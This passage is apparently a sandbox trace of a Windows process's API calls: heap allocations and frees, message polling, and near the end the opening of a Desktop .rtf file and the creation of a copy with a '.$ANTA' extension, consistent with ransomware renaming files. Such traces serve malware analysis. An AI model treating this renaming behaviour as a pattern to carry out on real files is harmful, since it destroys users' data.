hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0119.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0119.616] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0119.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0119.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0119.619] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0119.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0119.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0119.620] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\5nsszwi6b.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0119.620] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.620] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0119.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0119.621] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0119.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0119.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0119.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0119.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0119.623] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0119.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0119.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0119.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0119.623] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\5nsszwi6b.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0119.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0119.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: 